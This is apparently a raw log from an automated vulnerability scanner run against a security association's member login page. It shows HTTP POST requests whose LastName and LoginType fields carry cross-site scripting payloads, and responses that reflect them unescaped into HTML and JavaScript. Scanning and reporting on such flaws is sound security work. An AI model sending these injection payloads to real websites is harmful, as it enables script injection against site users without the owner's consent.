d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "Username"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:none; } div#UsernameIdentification { display:block; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"> <p class="ErrorMessage"><strong>ERROR:</strong> The credentials provided do not match membership records. Please try again.</p><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <input type="hidden" name="d" value="https://www.issa.org/Members/Log-In.php"> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" checked onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" value="3" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" value="Smith" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" value="netsparker@example.com" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" value="\'\"--></style></script><script>netsparker(0x000068)</script>" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" value="Smith" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" value="netsparker@example.com" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> ..
Parameters
Parameter
|
Type
|
Value
|
EmailAddress
|
POST
|
netsparker@example.com
|
EmailAddressReset
|
POST
|
netsparker@example.com
|
FirstName
|
POST
|
Smith
|
LastName
|
POST
|
'"--></style></script><script>alert(0x00006B)</script>
|
LoginType
|
POST
|
Username
|
MemberNumber
|
POST
|
3
|
SubmittedPassword
|
POST
|
3
|
Username
|
POST
|
Smith
|
Request
POST /Members/Log-In.php HTTP/1.1
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.issa.org
Cookie: cookiecheck=issa; PHPSESSID=d959e12eb1519d0294397b6c62589f93
Content-Length: 260
Accept-Encoding: gzip, deflate
EmailAddress=netsparker%40example.com&EmailAddressReset=netsparker%40example.com&FirstName=Smith&LastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00006B)%3c%2fscript%3e&LoginType=Username&MemberNumber=3&SubmittedPassword=3&Username=Smith
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:33:17 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "Username"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; border-left: 1px solid #CCCCCC; border-right: 1px solid #CCCCCC; } input.TextField { width: 80%; max-width: 15em; } td#loginBlockThree { padding: 0; padding-left: 1%; border: none; } h2.loginBlock { padding: 0; margin: 0; border: none; } div#MemberNumberIdentification { display:none; } div#UsernameIdentification { display:block; } div#EmailFirstLastIdentification { display:none; } div#AccountResetIdentification { display:none; } --> </style> <div id="ColumnB"> <p class="ErrorMessage"><strong>ERROR:</strong> The credentials provided do not match membership records. Please try again.</p><h1>Member Login</h1> <form id="LogInForm" method="POST" action=""> <input type="hidden" name="d" value="https://www.issa.org/Members/Log-In.php"> <table style="position: relative"> <tr> <td id="loginBlockOne" width="33%"> <h2 class="loginBlock">1. Login Type</h2> <table> <tr> <td><input name="LoginType" type="radio" value="MemberNumber" id="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');" /></td> <td><label for="UseMemberNumber" onMouseUp="SelectRadio('MemberNumber');">Member Number</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="Username" id="UseUsername" checked onMouseUp="SelectRadio('Username');" /></td> <td><label for="UseUsername" onMouseUp="SelectRadio('Username');">Username</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="EmailFirstLast" id="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');" /></td> <td><label for="UseEmailFirstLast" onMouseUp="SelectRadio('EmailFirstLast');">E-mail, First Name, Last Name</label></td> </tr> <tr> <td><input name="LoginType" type="radio" value="AccountReset" id="UseAccountReset" onMouseUp="SelectRadio('AccountReset');" /></td> <td><label for="UseAccountReset" onMouseUp="SelectRadio('AccountReset');">New Account or Forgotten Password</label></td> </tr> </table> </td> <td id="loginBlockTwo" width="31%"> <h2 class="loginBlock">2. Identification</h2> <div id="MemberNumberIdentification"> <h3>Member Number</h3> <input type="text" id="MemberNumber" name="MemberNumber" class="TextField" value="3" /> </div> <div id="UsernameIdentification"> <h3>Username</h3> <input type="text" id="Username" name="Username" class="TextField" value="Smith" /> <p><strong>NOTE:</strong> Usernames are no longer issued. If you have one, you may use it; otherwise, please use your member number.</p> </div> <div id="EmailFirstLastIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddress" name="EmailAddress" class="TextField" value="netsparker@example.com" /> <h3>First Name</h3> <input type="text" id="FirstName" name="FirstName" class="TextField" value="Smith" /> <h3>Last Name</h3> <input type="text" id="LastName" name="LastName" class="TextField" value="\'\"--></style></script><script>netsparker(0x00006B)</script>" /> </div> <div id="AccountResetIdentification"> <h3>Email Address</h3> <input type="text" id="EmailAddressReset" name="EmailAddressReset" class="TextField" value="netsparker@example.com" /> <p><input type="submit" id="Reset" value="Reset Password"></p> <p><strong>NOTE:</strong> if you don't know your e-mail address, please <a href="/Association/Contact.html">call ISSA</a> for password reset assistance.</p> </div> </td> <td id="loginBlockThree"> ..
Parameters
Parameter
|
Type
|
Value
|
EmailAddress
|
POST
|
netsparker@example.com
|
EmailAddressReset
|
POST
|
netsparker@example.com
|
FirstName
|
POST
|
Smith
|
LastName
|
POST
|
Smith
|
LoginType
|
POST
|
'"--></style></script><script>alert(0x00006D)</script>
|
MemberNumber
|
POST
|
3
|
SubmittedPassword
|
POST
|
3
|
Username
|
POST
|
Smith
|
Request
POST /Members/Log-In.php HTTP/1.1
Referer: https://www.issa.org/Members/Log-In.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.issa.org
Cookie: cookiecheck=issa; PHPSESSID=d959e12eb1519d0294397b6c62589f93
Content-Length: 257
Accept-Encoding: gzip, deflate
EmailAddress=netsparker%40example.com&EmailAddressReset=netsparker%40example.com&FirstName=Smith&LastName=Smith&LoginType='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00006D)%3c%2fscript%3e&MemberNumber=3&SubmittedPassword=3&Username=Smith
Response
HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 21:33:21 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b mod_bwlimited/1.4 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cookiecheck=issa
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Member Login</title>
<meta name="description" content="The ISSA is an unbiased third party made up solely of security practitioners and, as such, is not motivated by politics or profits; only the ethical professionalism of our members and their dedication to protecting information resources in a professional manner. ">
<meta name="keywords" content="security, security association, network security, internet security, data security">
<meta name="verify-v1" content="FwJolkV798m+nBxL9ELBCqQEogmxS8dxHUGv89Q1naM=" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link href="/css/FluidOneColumn.css" rel="stylesheet" type="text/css" />
<link href="/css/issa.css" rel="stylesheet" type="text/css" />
<link href="/css/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javaScript" src="/js/jquery.js"></script>
<script type="text/javaScript" src="/js/nav.js"></script>
<script type="text/javaScript" src="/js/antispam.js"></script>
<script type="text/javaScript" src="/js/table.js"></script>
<script type="text/javascript">
<!--
$(document).ready(
function()
{
renderBanners();
alternateRowColors();
$("a[@name]").css({padding: "0", background: "none"});
var CurrentHeight = 0;
$(document).ready(function() {
resizeULs();
});
$(window).bind("resize", function() {
resizeULs();
});
}
);
function resizeULs()
{
$("ul.Layout").each(function(j) {
CurrentHeight = 0;
$(this).find("li").each(function(i) {
if (CurrentHeight < $(this).height()) {
CurrentHeight = $(this).height();
}
});
$(this).find("li").each(function(i) {
$(this).css("padding-bottom", (CurrentHeight - $(this).height() + i) + "px");
});
});
}
function resize(div){
var d=document.getElementById(div);
if(navigator.appName=="Microsoft Internet Explorer"){
//ie
if(navigator.appVersion.indexOf('MSIE')>0){
d.style.height=document.documentElement.scrollHeight;
}
}else if(navigator.userAgent.indexOf("Chrome")>0){
//chrome
d.style.height=document.body.scrollHeight+"px";
}else{
//ff and all other nice browsers
d.style.height=document.documentElement.scrollHeight+"px";
}
}
-->
</script>
<!--<script>
$(function(){
$('#Sponsors').cycle({
fx: 'fade',
delay: -500
});
});
</script>-->
</head>
<body>
<div id="wrapLeft">
<div id="wrapRight">
<div id="Container">
<div id="TopBar">
<a id="NewsFeed" href="https://connect.issa.org
">Log in and check out the new ISSA Connect!</a>
<a href="/" id="Home">Home</a>
<a href="/page/?p=Site_Map_2" id="SiteMap">Site Map</a>
<a href="/Members/Log-In.php" id="LogIn">Log In</a>
<a href="/page/?p=33" id="Contact">Contact</a>
</div>
<div id="LogoBar">
<div id="searchFormContainer">
<div id="searchForm">
<form name="search" method="get" action="/search.php">
<a href="javascript:document.search.submit();">search</a>
<input type="text" name="q" size="20" style="font-size:12px;border-width:1px;" />
</form>
</div>
</div>
<a href="/" id="Logo"></a>
<div style="width:409px;height:85px;">
</div>
</div>
<div id="nav">
<ul id="jsddm">
<li><a href="/page/?p=Profile_16">About ISSA</a>
<ul>
<li><a href="/page/?p=Profile_16">Association</a></li>
<li><a href="/page/?p=77">International Board</a></li>
<li><a href="/page/?p=17">Code of Ethics</a></li>
<li><a href="/page/?p=33">Contact</a></li>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<!--<li><a href="/Association/25year.html">25th Anniversary</a></li>-->
<li><a href="/page/?p=18">FAQ</a></li>
</ul>
</li>
<li><a href="https://connect.issa.org/index.jspa">Connect</a>
<ul>
<li><a href="/page/?p=Benefits_of_Membership_9">Benefits of Membership</a></li>
<li><a href="https://www.issa.org/page/?p=86">Dues</a></li>
<li><a href="https://connect.issa.org/index.jspa">ISSA Connect</a></li>
<li><a href="/page/?p=Application_Form_6">Membership Application</a></li>
<li><a href="/page/?p=Membership_Types_10">Membership Types</a></li>
<!--<li><a href="/page/?p=Join_Online_8">Join Online</a></li>-->
<!--<li><a href="/page/?p=Renew_Online_7">Renew Online</a></li>-->
</ul>
</li>
<li><a href="#">Learn</a>
<ul>
<li><a href="http://ciso.issa.org/">CISO Executive Forum</a></li>
<li><a href="/News/">E-News</a></li>
<li><a href="/events/#2">Industry Events</a></li>
<li><a href="/page/?p=70">Industry Webinars</a></li>
<li><a href="/page/?p=105">International Conference</a></li>
<li><a href="/events/#1">ISSA Events</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/page/?p=57">ISSA Web Conferences</a></li>
<li><a href="/page/?p=Whitepapers_11">Whitepapers</a></li>
</ul>
</li>
<li><a href="#">Advance</a>
<ul>
<li><a href="/page/?p=21">Award - Honorees</a></li>
<li><a href="/page/?p=Careers_12">Career Center</a></li>
<li><a href="/page/?p=20">Community Outreach</a></li>
<li><a href="/page/?p=117">Educational Advisory Council</a></li>
<li><a href="/page/?p=269">Fellow Program</a></li>
<li><a href="/page/?p=Certifications_13">Industry Certifications</a></li>
</ul>
</li>
<li><a href="/Members/Your-Profile.html">Members</a>
<ul>
<li><a href="/page/?p=138">Elections</a></li>
<li><a href="/Resources/?p=SupportMaterials">Member Resources</a></li>
<li><a href="/Members/Member-Search.html">Member Search</a></li>
<li><a href="/page/?p=78">Membership Card</a></li>
<li><a href="/Members/Your-Profile.html">My Profile</a></li>
<li><a href="/page/?p=ISSA_Buyers_Guide_and_Discount_Directory_3">Special Offers</a></li>
<li><a href="/page/?p=Call_for_Volunteers_5">Volunteer</a></li>
</ul>
</li>
<li><a href="#">Chapters</a>
<ul>
<li><a href="/Chapters/Chapter-Administration.html">Admin</a></li>
<li><a href="/Chapters/Chapter-Directory.html">Chapter Directory</a></li>
<li><a href="/conf/?p=172">Chapter Leaders Congress</a></li>
<li><a href="/Chapters/?p=CPAC">CPAC Information</a></li>
<li><a href="/Members/Log-In.php">Officer Login</a></li>
<li><a href="/page/?p=27">Start a Chapter</a></li>
</ul>
</li>
<li><a href="#">Sponsorship</a>
<ul>
<li><a href="/page/?p=41">Become a Sponsor</a></li>
<li><a href="/Members/Journal/">ISSA Journal</a></li>
<li><a href="/Sponsorship/?p=MediaKit">Media Kit</a></li>
<li><a href="/page/?p=ISSA_Sponsors_39">Patron Sponsors</a></li>
</ul>
</li>
<li><a><span style="color:#FFB90F"><strong>Join Now</strong></span></a>
<ul>
<li><a href="/page/?p=Join_Online_8">New Members</a></li>
<li><a href="/Join/Renew-Online.html">Returning Members</a></li>
</ul>
</li>
</ul>
</div>
<div id="Content">
<script type="text/javascript" src="sha1.js"></script> <script language="javascript"> <!-- CurrentlyVisible = "\'\"--></style></script><script>netsparker(0x00006D)</script>"; function SelectRadio(IDtoSelect) { document.getElementById("Use" + IDtoSelect).checked="true"; document.getElementById(CurrentlyVisible + "Identification").style.display="none"; if (IDtoSelect == "AccountReset") { document.getElementById("loginBlockTwo").style.borderRight="none"; document.getElementById("loginBlockThree").style.display="none"; } else { document.getElementById("loginBlockTwo").style.borderRight="1px solid #CCCCCC"; document.getElementById("loginBlockThree").style.display="block"; } document.getElementById(IDtoSelect + "Identification").style.display="block"; if (IDtoSelect == 'EmailFirstLast') { ObjectSelected = document.getElementById('EmailAddress'); ObjectSelected.focus(); } else if (IDtoSelect == 'AccountReset') { ObjectSelected = document.getElementById('EmailAddressReset'); ObjectSelected.focus(); } else { ObjectSelected = document.getElementById(IDtoSelect); ObjectSelected.focus(); } CurrentlyVisible = IDtoSelect; } --> </script> <style type="text/css"> <!-- label:hover { cursor: pointer; } td#loginBlockOne { padding: 0; border: none; } td#loginBlockOne td { border: none; padding: .25em; vertical-align: middle; } td#loginBlockOne label { font-family: Tahoma, sans-serif; font-size: .9em; margin: 0; padding: 0; } td#loginBlockTwo { padding: 0; padding-left: 1%; border: none; 